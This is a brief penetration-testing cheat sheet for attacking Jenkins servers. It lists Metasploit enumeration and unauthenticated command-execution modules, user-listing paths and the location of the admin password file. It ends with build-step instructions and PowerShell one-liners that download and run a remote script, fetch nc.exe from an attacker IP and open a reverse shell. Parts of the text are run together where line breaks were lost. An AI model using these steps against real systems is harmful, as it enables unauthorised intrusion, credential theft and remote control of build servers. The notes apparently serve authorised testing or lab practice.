jenkins_enum: use auxiliary/scanner/http/jenkins_enum
unauthenticated command execution: use auxiliary/scanner/http/jenkins_command
Interesting Paths
# version check/oops/err# without credentials, lists current users/people/asynchPeople//securityRealm/user/admin/search/index?q=USERNAME# password file in windowsC:\Users\Administrator\.jenkins\secrets\initialAdminPassword
New Item > Freestyle Project > Build > Add Build Step > Execute Windows Batch Command
powershell iex (New-Object System.Net.WebClient).DownloadString('http://IP/shell.ps1')powershell wget "http://IP/nc.exe"-outFile "nc.exe"nc.exe-e cmd.exe IP PORT